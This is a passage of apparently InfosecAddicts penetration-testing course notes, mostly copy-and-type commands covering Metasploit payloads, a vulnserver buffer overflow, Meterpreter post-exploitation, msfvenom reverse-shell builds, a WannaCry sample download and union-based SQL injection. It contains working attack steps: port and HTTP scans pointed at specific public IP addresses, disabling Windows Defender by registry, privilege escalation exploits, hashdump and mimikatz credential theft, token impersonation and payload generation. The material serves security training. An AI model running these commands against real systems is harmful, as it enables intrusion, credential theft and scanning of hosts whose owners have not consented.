  883.  
  884.  
  885. - Stages are downloaded by stagers and typically do complex tasks, like VNC sessions, Meterpreter sessions, or bind
  886. shells.
  887. ---------------------------Type This-----------------------------------
  888. cd singles
  889. cd windows
  890. ls
  891. -----------------------------------------------------------------------
  892.  
  893.  
  894. - We can see several different payloads here that we can use on a windows system. Let's take a look at adduser.rb and
  895. see what it actually does.
  896. ---------------------------Type This-----------------------------------
  897. cat adduser.rb
  898. -----------------------------------------------------------------------
  899.  
  900. Which when looking at the code, we can see that it will add a new user called "Metasploit" to the machine and give
  901. the new user "Metasploit" a password of "Metasploit$1" Further down in the file we can actually see the command that
  902. it gives Windows to add the user to the system.
  903.  
  904.  
  905. - Stagers just connect to victim machine back to yours to download the Stages payload, usually with a
  906.  
  907. windows/shell/bind_tcp or windows/shell/reverse_tcp
  908. ---------------------------Type This-----------------------------------
  909. cd ../../stagers
  910. ls
  911. -----------------------------------------------------------------------
  912.  
  913.  
  914.  
  915. - Again, we can see that we have stagers for multiple systems and code types.
  916. ---------------------------Type This-----------------------------------
  917. ls windows/
  918. -----------------------------------------------------------------------
  919.  
  920.  
  921. As you can see, the stagers are mainly just to connect to the victim, to setup a bridge between us and the victim
  922. machine, so we can upload or download our stage payloads and execute commands.
  923. Lastly, we can go to our stages directory to see what all payloads are available for us to send over for use with
  924. our stagers...
  925. ---------------------------Type This-----------------------------------
  926. cd ../stages
  927. ls
  928. -----------------------------------------------------------------------
  929.  
  930.  
  931. Again, we can see that our stages are coded for particular operating systems and languages.
  932. We can take a look at shell.rb and see the shellcode that would be put into the payload that would be staged on the
  933. victim machine which would be encoded to tell the victim machine where to connect back to and what commands to run,
  934. if any.
  935.  
  936. - Other module directories include nops, encoders, and post. Post modules are what are used in sessions that have
  937. already been opened in meterpreter, to gain more information on the victim machine, collect hashes, or even tokens,
  938. so we can impersonate other users on the system in hopes of elevating our privileges.
  939. ---------------------------Type This-----------------------------------
  940. cd ../../../post/
  941. ls
  942. cd windows/
  943. ls
  944. -----------------------------------------------------------------------
  945.  
  946.  
  947. Inside the windows directory we can see all the post modules that can be run, capture is a directory that holds all
  948. the modules to load keyloggers, or grab input from the victim machine. Escalate has modules that will try to
  949. escalate our privileges. Gather has modules that will try to enumerate the host to get as much information as
  950. possible out of it. WLAN directory holds modules that can pull down WiFi access points that the victim has in
  951. memory/registry and give you the AP names as well as the WEP/WPA/WPA2 key for the network.
  952.  
  953. #################################
  954. # Getting start with MSFConsole #
  955. #################################
  956.  
  957. ---------------------------Type This-----------------------------------
  958. cd ~/toolz/metasploit/
  959.  
  960. ./msfconsole
  961. ----------------------------------------------------------------------
  962.  
  963.  
  964.  
  965. ##############################################
  966. # Run any Linux command inside of MSFConsole #
  967. ##############################################
  968.  
  969. Once you are inside of MSFConsole you want to do EVERYTHING
  970. that you'd normally do in your Linux command shell in addition
  971. to running Metasploit commands.
  972.  
  973.  
  974. ---------------------------Type This-----------------------------------
  975. ls
  976.  
  977. pwd
  978.  
  979. ping -c1 yahoo.com
  980.  
  981. nmap yahoo.com
  982. ----------------------------------------------------------------------
  983.  
  984.  
  985.  
  986.  
  987. - You're on the outside scanning publicly accessable targets.
  988.  
  989.  
  990. ---------------------------Type This-----------------------------------
  991. use auxiliary/scanner/portscan/tcp
  992.  
  993. set RHOSTS 217.108.137.200
  994.  
  995. set PORTS 80,1433,1521,3306,8000,8080,8081,10000
  996.  
  997. run
  998. ----------------------------------------------------------------------
  999.  
  1000.  
  1001.  
  1002. - So let's do a quick google search for someone with trace.axd file
  1003. - filetye:axd inurl:trace.axd
  1004. --------------------------Type This-----------------------------------
  1005. use auxiliary/scanner/http/ (press the tab key, then press y to look through the http options)
  1006. ----------------------------------------------------------------------
  1007.  
  1008. - Here is an example:
  1009. ---------------------------Type This-----------------------------------
  1010. use auxiliary/scanner/http/trace_axd
  1011.  
  1012. set RHOSTS 207.20.57.112
  1013.  
  1014. set VHOST www.motion-vr.net
  1015.  
  1016. run
  1017. ----------------------------------------------------------------------
  1018.  
  1019.  
  1020.  
  1021.  
  1022. ---------------------------Type This-----------------------------------
  1023. use auxiliary/scanner/http/http_version
  1024.  
  1025. set RHOSTS 45.77.162.239
  1026.  
  1027. set RPORT 80
  1028.  
  1029. run
  1030. ----------------------------------------------------------------------
  1031.  
  1032.  
  1033. ---------------------------Type This-----------------------------------
  1034. use auxiliary/scanner/http/tomcat_enum
  1035.  
  1036. set RHOSTS 217.108.137.200
  1037.  
  1038. set RPORT 8080
  1039.  
  1040. run
  1041. -----------------------------------------------------------------------
  1042.  
  1043.  
  1044. #####################################
  1045. # Quick Stack Based Buffer Overflow #
  1046. #####################################
  1047.  
  1048. - You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
  1049. http://45.63.104.73/ExploitLab.zip
  1050. http://45.63.104.73/nc-password-is-netcat.zip <--- save this file to your c:\windows\system32 directory
  1051.  
  1052.  
  1053.  
  1054. - Extract the ExploitLab.zip file to your Desktop
  1055.  
  1056. - Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  1057.  
  1058. - Open a new command prompt and type:
  1059.  
  1060. ---------------------------Type This-----------------------------------
  1061. nc localhost 9999
  1062. --------------------------------------------------------------------------
  1063.  
  1064. - In the new command prompt window where you ran nc type:
  1065. HELP
  1066.  
  1067. - Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
  1068. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  1069.  
  1070. - Now double-click on 1-simplefuzzer.py
  1071. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  1072.  
  1073.  
  1074. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
  1075.  
  1076. - Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
  1077.  
  1078. - Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
  1079.  
  1080. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  1081.  
  1082. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  1083.  
  1084. - Calculate the distance to EIP by running script 3-3000chars.py
  1085. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
  1086.  
  1087. 4-count-chars-to-EIP.py
  1088. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
  1089. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  1090.  
  1091. 5-2006char-eip-check.py
  1092. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
  1093.  
  1094. 6-jmp-esp.py
  1095. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  1096.  
  1097. 7-first-exploit
  1098. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  1099.  
  1100. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
  1101.  
  1102.  
  1103. ------------------------------
  1104.  
  1105.  
  1106.  
  1107. Skill Level 3. Identify unknown vulnerabilities
  1108. -----------------------------------------------
  1109.  
  1110. - App Type
  1111. ------------
  1112. Stand Alone Client Server Web App
  1113.  
  1114. ***(vulnerserver.exe)***
  1115.  
  1116.  
  1117. - Input TYpe
  1118. -------------
  1119. FIle logical network port Browser
  1120. Keyboard
  1121. Mouse
  1122.  
  1123.  
  1124.  
  1125. ***(9999)***
  1126.  
  1127.  
  1128. - Map & Fuzz app entry points:
  1129. ------------------------------
  1130. - Commands ***(commands)***
  1131. - Methods
  1132. - Verbs
  1133. - functions
  1134. - subroutines
  1135. - controllers
  1136.  
  1137.  
  1138. - Isolate the crash
  1139. -------------------
  1140. App seems to reliably crash at TRUN 2100
  1141.  
  1142.  
  1143. - Calculate the distance to EIP
  1144. -------------------------------
  1145. Distance to EIP is 2006
  1146.  
  1147. We found that EIP was populated with the value: 396F4338
  1148. 396F4338 is 8 (38), C (43), o (6F), 9 (39) so we search for 8Co9 in the non_repeating pattern
  1149.  
  1150. An online tool that we can use for this is:
  1151. https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html
  1152.  
  1153.  
  1154.  
  1155. - Redirect Program Execution
  1156. ----------------------------
  1157. A 3rd party dll named essfunc.dll seems to be the best candidate for the 'JMP ESP' instruction.
  1158. We learned that we control EAX and ESP in script 2.
  1159.  
  1160.  
  1161.  
  1162.  
  1163.  
  1164. - Implement Shellcode
  1165. ---------------------
  1166. There are only 2 things that can go wrong with shellcode:
  1167. - Not enough space
  1168. - Bad characters
  1169.  
  1170.  
  1171.  
  1172.  
  1173.  
  1174.  
  1175. #########################################
  1176. # FreeFloat FTP Server Exploit Analysis #
  1177. #########################################
  1178.  
  1179.  
  1180.  
  1181. Analyze the following exploit code:
  1182. https://www.exploit-db.com/exploits/15689/
  1183.  
  1184. 1. What is the target platform that this exploit works against?
  1185. 2. What is the variable name for the distance to EIP?
  1186. 3. What is the actual distance to EIP in bytes?
  1187. 4. Describe what is happening in the variable ‘junk2’
  1188.  
  1189.  
  1190.  
  1191.  
  1192. Analysis of the training walk-through based on EID: 15689:
  1193. http://45.63.104.73/ff.zip
  1194.  
  1195.  
  1196.  
  1197.  
  1198. ff1.py
  1199. 1. What does the sys module do?
  1200. 2. What is sys.argv[1] and sys.argv[2]?
  1201. 3. What application entry point is being attacked in this script?
  1202.  
  1203.  
  1204.  
  1205. ff2.py
  1206. 1. Explain what is happening in lines 18 - 20 doing.
  1207. 2. What is pattern_create.rb doing and where can I find it?
  1208. 3. Why can’t I just double click the file to run this script?
  1209.  
  1210.  
  1211.  
  1212. ff3.py
  1213. 1. Explain what is happening in lines 17 - to 25?
  1214. 2. Explain what is happening in lines 30 - to 32?
  1215. 3. Why is everything below line 35 commented out?
  1216.  
  1217.  
  1218.  
  1219. ff4.py
  1220. 1. Explain what is happening in lines 13 to 15.
  1221. 2. Explain what is happening in line 19.
  1222. 3. What is the total length of buff?
  1223.  
  1224.  
  1225.  
  1226. ff5.py
  1227. 1. Explain what is happening in line 15.
  1228. 2. What is struct.pack?
  1229. 3. How big is the shellcode in this script?
  1230.  
  1231.  
  1232.  
  1233. ff6.py
  1234. 1. What is the distance to EIP?
  1235. 2. How big is the shellcode in this script?
  1236. 3. What is the total byte length of the data being sent to this app?
  1237.  
  1238.  
  1239.  
  1240.  
  1241. ff7.py
  1242. 1. What is a tuple in python?
  1243. 2. How big is the shellcode in this script?
  1244. 3. Did your app crash in from this script?
  1245.  
  1246.  
  1247.  
  1248.  
  1249. ff8.py
  1250. 1. How big is the shellcode in this script?
  1251. 2. What is try/except in python?
  1252. 3. What is socket.SOCK_STREAM in Python?
  1253.  
  1254.  
  1255.  
  1256. ff9.py
  1257. 1. What is going on in lines 19 and 20?
  1258. 2. What is the length of the NOPs?
  1259. 3. From what DLL did the address of the JMP ESP come from?
  1260.  
  1261.  
  1262.  
  1263.  
  1264. ff010.py
  1265. 1. What is going on in lines 18 - 20?
  1266. 2. What is going on in lines 29 - 32?
  1267. 3. How would a stack adjustment help this script?
  1268.  
  1269.  
  1270. #####################################################
  1271. # Log into the Linux virtual machine on your laptop #
  1272. # username: infosecaddicts #
  1273. # password: infosecaddicts #
  1274. #####################################################
  1275.  
  1276.  
  1277. /bin/bash
  1278.  
  1279. sudo apt-get install -y build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev libyaml-dev curl zlib1g-dev gawk bison libffi-dev libgdbm-dev libncurses5-dev libtool sqlite3 libgmp-dev gnupg2 dirmngr nmap
  1280.  
  1281. gpg2 --keyserver hkp://pool.sks-keyservers.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB
  1282.  
  1283. curl -L https://get.rvm.io | bash -s stable
  1284.  
  1285. source ~/.rvm/scripts/rvm
  1286.  
  1287. echo "source ~/.rvm/scripts/rvm" >> ~/.bashrc
  1288.  
  1289. source ~/.bashrc
  1290.  
  1291. RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O - )
  1292.  
  1293. rvm install $RUBYVERSION
  1294.  
  1295. rvm use $RUBYVERSION --default
  1296.  
  1297. cd ~/toolz
  1298.  
  1299. sudo git clone https://github.com/rapid7/metasploit-framework.git
  1300.  
  1301. sudo chown -R `whoami` ~/toolz/metasploit-framework
  1302.  
  1303. mv metasploit-framework metasploit
  1304.  
  1305. cd ~/toolz/metasploit
  1306.  
  1307. rvm --default use ruby-${RUBYVERSION}@metasploit
  1308.  
  1309. rvm --default use ruby-${RUBYVERSION}@metasploit
  1310.  
  1311. rvm use $RUBYVERSION --default
  1312.  
  1313. ruby -v
  1314.  
  1315. gem install bundler
  1316.  
  1317. bundle install
  1318.  
  1319. gem install bundler
  1320.  
  1321. bundle install
  1322.  
  1323.  
  1324. ################################
  1325. # Exploitation with Metasploit #
  1326. ################################
  1327. Step 1: Disable the firewall on your Windows 10 host
  1328.  
  1329. Step 2: Run your command prompt as an administrator
  1330. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  1331.  
  1332. Step 3: Restart your computer (I'm sorry - I know this sux!)
  1333.  
  1334. Step 4: Start the vulnerable server (no need to turn on OllyDBG)
  1335.  
  1336. Step 5: From your CentoS run the following commands
  1337. ---------------------------Type This-----------------------------------
  1338. cd ~/
  1339.  
  1340. wget https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
  1341.  
  1342. unzip ExploitLab.zip
  1343.  
  1344. cd ExploitLab/4-AttackScripts/
  1345.  
  1346. vi vulnserv.rb
  1347.  
  1348. cp vulnserv.rb ~/toolz/metasploit/modules/exploits/windows/misc
  1349.  
  1350. cd ~/toolz/metasploit/
  1351.  
  1352. ./msfconsole
  1353.  
  1354.  
  1355.  
  1356. use exploit/windows/misc/vulnserv
  1357. set PAYLOAD windows/meterpreter/bind_tcp
  1358. set RHOST [CHANGEME-TO-YOUR-WIN10-IP]
  1359. set RPORT 9999
  1360. exploit
  1361. -----------------------------------------------------------------------
  1362.  
  1363.  
  1364.  
  1365.  
  1366.  
  1367. ###########################
  1368. # Client-Side Enumeration #
  1369. ###########################
  1370.  
  1371.  
  1372.  
  1373. ********************************** Figure out who and where you are **********************************
  1374.  
  1375.  
  1376. ---------------------------Type This-----------------------------------
  1377. meterpreter> sysinfo
  1378.  
  1379.  
  1380. meterpreter> getuid
  1381.  
  1382.  
  1383. meterpreter> ipconfig
  1384.  
  1385.  
  1386. meterpreter> run post/windows/gather/checkvm
  1387.  
  1388. meterpreter> run post/multi/manage/autoroute
  1389. -----------------------------------------------------------------------
  1390.  
  1391.  
  1392. ********************************** Enumerate the host you are on **********************************
  1393.  
  1394.  
  1395. ---------------------------Type This-----------------------------------
  1396. meterpreter > run post/windows/gather/enum_applications
  1397.  
  1398. meterpreter > run post/windows/gather/enum_logged_on_users
  1399.  
  1400. meterpreter > run post/windows/gather/usb_history
  1401.  
  1402. meterpreter > run post/windows/gather/enum_shares
  1403.  
  1404. meterpreter > run post/windows/gather/enum_snmp
  1405.  
  1406. meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
  1407. -----------------------------------------------------------------------
  1408.  
  1409.  
  1410.  
  1411.  
  1412. ********************************** Escalate privileges and get hashes **********************************
  1413.  
  1414.  
  1415. ---------------------------Type This-----------------------------------
  1416. meterpreter> use priv
  1417. -----------------------------------------------------------------------
  1418.  
  1419.  
  1420. --Option 1: GetSystem
  1421. ---------------------------Type This-----------------------------------
  1422. meterpreter> getsystem
  1423. -----------------------------------------------------------------------
  1424.  
  1425. --Option 2:
  1426. ---------------------------Type This-----------------------------------
  1427. meterpreter > run post/windows/escalate/getsystem
  1428. -----------------------------------------------------------------------
  1429.  
  1430. --Option 3:
  1431. ---------------------------Type This-----------------------------------
  1432. meterpreter> background
  1433. back
  1434. use post/windows/escalate/droplnk
  1435. set SESSION 1
  1436. set PAYLOAD windows/meterpreter/reverse_tcp
  1437. set LHOST [ ChangeME to CentOS VM IP ]
  1438. set LPORT 1234
  1439. exploit
  1440. -----------------------------------------------------------------------
  1441.  
  1442. --Option 4:
  1443. ---------------------------Type This-----------------------------------
  1444. use exploit/windows/local/bypassuac
  1445. set SESSION 1
  1446. set PAYLOAD windows/meterpreter/reverse_tcp
  1447. set LHOST [ ChangeME to CentOS VM IP ]
  1448. set LPORT 12345
  1449. exploit
  1450. -----------------------------------------------------------------------
  1451.  
  1452.  
  1453. --Option 5:
  1454. ---------------------------Type This-----------------------------------
  1455. use exploit/windows/local/service_permissions
  1456. set SESSION 1
  1457. set PAYLOAD windows/meterpreter/reverse_tcp
  1458. set LHOST [ ChangeME to CentOS VM IP ]
  1459. set LPORT 5555
  1460. exploit
  1461. -----------------------------------------------------------------------
  1462.  
  1463.  
  1464. --Option 6:
  1465. ---------------------------Type This-----------------------------------
  1466. use exploit/windows/local/trusted_service_path
  1467. set SESSION 1
  1468. set PAYLOAD windows/meterpreter/reverse_tcp
  1469. set LHOST [ ChangeME to CentOS VM IP ]
  1470. set LPORT 4567
  1471. exploit
  1472. -----------------------------------------------------------------------
  1473.  
  1474. --Option 7:
  1475. ---------------------------Type This-----------------------------------
  1476. use exploit/windows/local/ppr_flatten_rec
  1477. set SESSION 1
  1478. set PAYLOAD windows/meterpreter/reverse_tcp
  1479. set LHOST [ ChangeME to CentOS VM IP ]
  1480. set LPORT 7777
  1481. exploit
  1482. -----------------------------------------------------------------------
  1483.  
  1484.  
  1485. --Option 8:
  1486. ---------------------------Type This-----------------------------------
  1487. use exploit/windows/local/ms_ndproxy
  1488. set SESSION 1
  1489. set PAYLOAD windows/meterpreter/reverse_tcp
  1490. set LHOST [ ChangeME to CentOS VM IP ]
  1491. set LPORT 7788
  1492. exploit
  1493. -----------------------------------------------------------------------
  1494.  
  1495. --Option 9:
  1496. ---------------------------Type This-----------------------------------
  1497. use exploit/windows/local/ask
  1498. set SESSION 1
  1499. set PAYLOAD windows/meterpreter/reverse_tcp
  1500. set LHOST [ ChangeME to CentOS VM IP ]
  1501. set LPORT 7799
  1502. exploit
  1503. -----------------------------------------------------------------------
  1504.  
  1505.  
  1506. A window will pop up and you need to click Yes in order to get your new meterpreter shell
  1507.  
  1508.  
  1509. meterpreter > getuid
  1510.  
  1511. meterpreter > ps (search for a process running as NT AUTHORITY\SYSTEM)
  1512.  
  1513. meterpreter > migrate 2800 (your process id WILL NOT be 2800, but make sure you use one that is running at NT AUTHORITY\SYSTEM)
  1514.  
  1515. meterpreter > getsystem
  1516. ...got system (via technique 1).
  1517.  
  1518.  
  1519. meterpreter > getuid
  1520. Server username: NT AUTHORITY\SYSTEM
  1521.  
  1522.  
  1523. meterpreter> run post/windows/gather/hashdump
  1524.  
  1525. meterpreter> run post/windows/gather/credentials/credential_collector
  1526. -----------------------------------------------------------------------
  1527.  
  1528.  
  1529. ********************************** Steal Tokens **********************************
  1530.  
  1531. ---------------------------Type This-----------------------------------
  1532. meterpreter > getsystem
  1533.  
  1534. meterpreter > use incognito
  1535.  
  1536. meterpreter > list_tokens -u
  1537.  
  1538. meterpreter > list_tokens -g
  1539.  
  1540. meterpreter > impersonate_token <-- choose who you want to impersonate but be sure to use 2 slashes in the name (ex: impersonate_token domain\\user)
  1541.  
  1542. meterpreter> getuid
  1543. -----------------------------------------------------------------------
  1544.  
  1545.  
  1546. ************ Stealing credentials and certificates ************
  1547. - NOTE: Most of the stuff after 'kerberos' DOES NOT work, but is given here so you know the correct syntax to use when connected to AD or dealing with smart/CAC cards.
  1548.  
  1549. ---------------------------Type This-----------------------------------
  1550. meterpreter > getsystem
  1551.  
  1552. meterpreter > load mimikatz
  1553.  
  1554. meterpreter > kerberos
  1555.  
  1556. meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"
  1557.  
  1558. meterpreter > msv <-- Your AD password
  1559.  
  1560. meterpreter > livessp <-- Your Windows8 password
  1561.  
  1562. meterpreter > ssp <-- Your outlook password
  1563.  
  1564. meterpreter > tspkg <-- Your AD password
  1565.  
  1566. meterpreter > wdigest <-- Your AD password
  1567.  
  1568. meterpreter > mimikatz_command -f crypto::listStores
  1569.  
  1570. meterpreter > mimikatz_command -f crypto::listCertificates
  1571.  
  1572. meterpreter > mimikatz_command -f crypto::exportCertificates CERT_SYSTEM_STORE_CURRENT_USER
  1573.  
  1574. meterpreter > mimikatz_command -f crypto::patchcapi
  1575.  
  1576. meterpreter> search -d <directory> -f <file-pattern>
  1577. -----------------------------------------------------------------------
  1578. ###########################################
  1579. # Section 4: Custom Meterpreter Scripting #
  1580. ###########################################
  1581. ---------------------------Type This-----------------------------------
  1582. cd ~
  1583. mkdir binaries
  1584. cd ~/binaries
  1585. wget https://s3.amazonaws.com/infosecaddictsfiles/wce.exe
  1586. wget https://s3.amazonaws.com/infosecaddictsfiles/nc.exe
  1587. wget https://s3.amazonaws.com/infosecaddictsfiles/mimikatz.exe
  1588. -----------------------------------------------------------------------
  1589. - In this lab we will be looking at how you can use some custom Meterpreter scripts to do more than what Metasploit
  1590.  
  1591. can offer. This will also show you the flexibility of the Meterpreter scripts.
  1592.  
  1593. - We're going to start off with a simple Hello World script first.
  1594.  
  1595. ---------------------------Type This-----------------------------------
  1596. echo 'print_status("Hello World")' > /home/infosecaddicts/toolz/metasploit/scripts/meterpreter/helloworld.rb
  1597. -----------------------------------------------------------------------
  1598.  
  1599. - This next portion is up to you, exploit your test box and end up with a Meterpreter shell.
  1600.  
  1601. - Lets test out our helloworld.rb Meterpreter script.
  1602.  
  1603. ---------------------------Type This-----------------------------------
  1604. meterpreter> run helloworld
  1605.  
  1606.  
  1607. - So far so good, now we can build on this base. Lets add a couple more API calls to the script.
  1608.  
  1609. - Open /home/infosecaddicts/toolz/metasploit/scripts/meterpreter/helloworld.rb in your favorite and add following
  1610.  
  1611. line.
  1612. ---------------------------Type This-----------------------------------
  1613. vi /home/infosecaddicts/toolz/metasploit/scripts/meterpreter/helloworld.rb
  1614.  
  1615.  
  1616. ---------------------------Type This-----------------------------------
  1617. print_error("this is an error!")
  1618. print_line("this is a line")
  1619.  
  1620. - Now run the script:
  1621.  
  1622. meterpreter> run helloworld
  1623.  
  1624.  
  1625. - Now that we have the basics down, we're going to do something a little more exciting.
  1626. - The architecture to follow when creating these scripts goes as follows:
  1627.  
  1628. def getinfo(session)
  1629. begin
  1630. <stuff goes here>
  1631. rescue ::Exception => e
  1632. <stuff goes here>
  1633. end
  1634. end
  1635.  
  1636. -----------------------------------------------------------------------
  1637. - Copy and paste the following code into our helloworld.rb script:
  1638. ---------------------------Type This-----------------------------------
  1639. def getinfo(session)
  1640. begin
  1641. sysnfo = session.sys.config.sysinfo
  1642. runpriv = session.sys.config.getuid
  1643. print_status("Getting system information ...")
  1644. print_status("The target machine OS is #{sysnfo['OS']}")
  1645. print_status("The computer name is #{'Computer'} ")
  1646. print_status("Script running as #{runpriv}")
  1647. rescue ::Exception => e
  1648. print_error("The following error was encountered #{e}")
  1649. end
  1650. end
  1651.  
  1652. getinfo(client)
  1653. --------------------------------------------------------------------------
  1654.  
  1655.  
  1656. - Now run the script:
  1657. ---------------------------Type This-----------------------------------
  1658. meterpreter> run helloworld
  1659.  
  1660.  
  1661. - We can expand it by adding actual system commands to the script, lets look at how we can do this.
  1662.  
  1663. ---------------------------Type This-----------------------------------
  1664. def list_exec(session,cmdlst)
  1665. print_status("Running Command List ...")
  1666. r=''
  1667. session.response_timeout=120
  1668. cmdlst.each do |cmd|
  1669. begin
  1670. print_status "running command #{cmd}"
  1671. r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
  1672. while(d = r.channel.read)
  1673.  
  1674. print_status("#{d}")
  1675. end
  1676. r.channel.close
  1677. r.close
  1678. rescue ::Exception => e
  1679. print_error("Error Running Command #{cmd}: #{e.class} #{e}")
  1680. end
  1681. end
  1682. end
  1683.  
  1684. commands = [ "set",
  1685. "ipconfig /all",
  1686. "arp -a"]
  1687.  
  1688. list_exec(client,commands)
  1689. ------------------------------------------------------------------------
  1690.  
  1691.  
  1692. - Run the script:
  1693. ---------------------------Type This-----------------------------------
  1694. meterpreter> run helloworld
  1695.  
  1696.  
  1697. Note: Add all of the commands from the script below to your helloworld.rb script:
  1698. https://raw.githubusercontent.com/rapid7/metasploit-framework/master/scripts/meterpreter/winenum.rb
  1699.  
  1700.  
  1701.  
  1702. ---------------------------------------------------------------------------------
  1703.  
  1704.  
  1705. wget http://45.63.104.73/wannacry.zip
  1706.  
  1707. unzip wannacry.zip
  1708. **** password is infected ***
  1709.  
  1710. file wannacry.exe
  1711.  
  1712. objdump -x wannacry.exe
  1713.  
  1714. strings wannacry.exe
  1715.  
  1716. strings --all wannacry.exe | head -n 6
  1717.  
  1718. strings wannacry.exe | grep -i dll
  1719.  
  1720. strings wannacry.exe | grep -i library
  1721.  
  1722. strings wannacry.exe | grep -i reg
  1723.  
  1724. strings wannacry.exe | grep -i key
  1725.  
  1726. strings wannacry.exe | grep -i rsa
  1727.  
  1728. strings wannacry.exe | grep -i open
  1729.  
  1730. strings wannacry.exe | grep -i get
  1731.  
  1732. strings wannacry.exe | grep -i mutex
  1733.  
  1734. strings wannacry.exe | grep -i irc
  1735.  
  1736. strings wannacry.exe | grep -i join
  1737.  
  1738. strings wannacry.exe | grep -i admin
  1739.  
  1740. strings wannacry.exe | grep -i list
  1741.  
  1742.  
  1743. cd ~/toolz/metasploit/
  1744. ./msfvenom -p windows/meterpreter/reverse_tcp lhost={<your-linux-vm-ip>} lport=443 -f exe -o ~/yourname_reverseshell_payload.exe
  1745. ./msfvenom -p windows/meterpreter/bind_tcp lport=4444 -f exe -o ~/yourname_bindshell_payload.exe
  1746. ./msfvenom -p windows/exec CMD=calc.exe -f exe -o ~/yourname_calc_payload.exe
  1747. ./msfvenom -p windows/vncinject/reverse_tcp lhost={<your-linux-vm-ip>} lport=443 -f exe -o ~/yourname_vncinject_reverseshell_payload.exe
  1748.  
  1749. cd ~
  1750.  
  1751. ***** now run all of the previous commands against your newly created payloads *****
  1752.  
  1753. **** now upload your newly created payloads to virustotal ****
  1754.  
  1755. **** now upload your newly created payloads to reverse.it ****
  1756.  
  1757.  
  1758.  
  1759. ##################################
  1760. # Basic: Web Application Testing #
  1761. ##################################
  1762.  
  1763. Most people are going to tell you reference the OWASP Testing guide.
  1764. https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
  1765.  
  1766. I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
  1767.  
  1768.  
  1769. The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
  1770.  
  1771. 1. Does the website talk to a DB?
  1772. - Look for parameter passing (ex: site.com/page.php?id=4)
  1773. - If yes - try SQL Injection
  1774.  
  1775. 2. Can I or someone else see what I type?
  1776. - If yes - try XSS
  1777.  
  1778. 3. Does the page reference a file?
  1779. - If yes - try LFI/RFI
  1780.  
  1781. Let's start with some manual testing against 45.63.104.73
  1782.  
  1783.  
  1784. #######################
  1785. # Attacking PHP/MySQL #
  1786. #######################
  1787.  
  1788. Go to LAMP Target homepage
  1789. https://phpapp.infosecaddicts.com/
  1790.  
  1791.  
  1792.  
  1793. Clicking on the Acer Link:
  1794. https://phpapp.infosecaddicts.com/acre2.php?lap=acer
  1795.  
  1796. - Found parameter passing (answer yes to question 1)
  1797. - Insert ' to test for SQLI
  1798.  
  1799. ---------------------------Type This-----------------------------------
  1800.  
  1801. https://phpapp.infosecaddicts.com/acre2.php?lap=acer'
  1802.  
  1803. -----------------------------------------------------------------------
  1804.  
  1805. Page returns the following error:
  1806. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''acer''' at line 1
  1807.  
  1808.  
  1809.  
  1810. In order to perform union-based sql injection - we must first determine the number of columns in this query.
  1811. We do this using the ORDER BY
  1812.  
  1813. ---------------------------Type This-----------------------------------
  1814.  
  1815. https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 100-- +
  1816. -----------------------------------------------------------------------
  1817.  
  1818. Page returns the following error:
  1819. Unknown column '100' in 'order clause'
  1820.  
  1821.  
  1822. ---------------------------Type This-----------------------------------
  1823.  
  1824. https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 50-- +
  1825. -----------------------------------------------------------------------
  1826.  
  1827. Page returns the following error:
  1828. Unknown column '50' in 'order clause'
  1829.  
  1830.  
  1831. ---------------------------Type This-----------------------------------
  1832.  
  1833. https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 25-- +
  1834. -----------------------------------------------------------------------
  1835.  
  1836. Page returns the following error:
  1837. Unknown column '25' in 'order clause'
  1838.  
  1839.  
  1840. ---------------------------Type This-----------------------------------
  1841.  
  1842. https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 12-- +
  1843. -----------------------------------------------------------------------
  1844.  
  1845. Page returns the following error:
  1846. Unknown column '12' in 'order clause'
  1847.  
  1848.  
  1849. ---------------------------Type This-----------------------------------
  1850.  
  1851. https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 6-- +
  1852. -----------------------------------------------------------------------
  1853.  
  1854. ---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
  1855.  
  1856.  
  1857.  
  1858. Now we build out the union all select statement with the correct number of columns
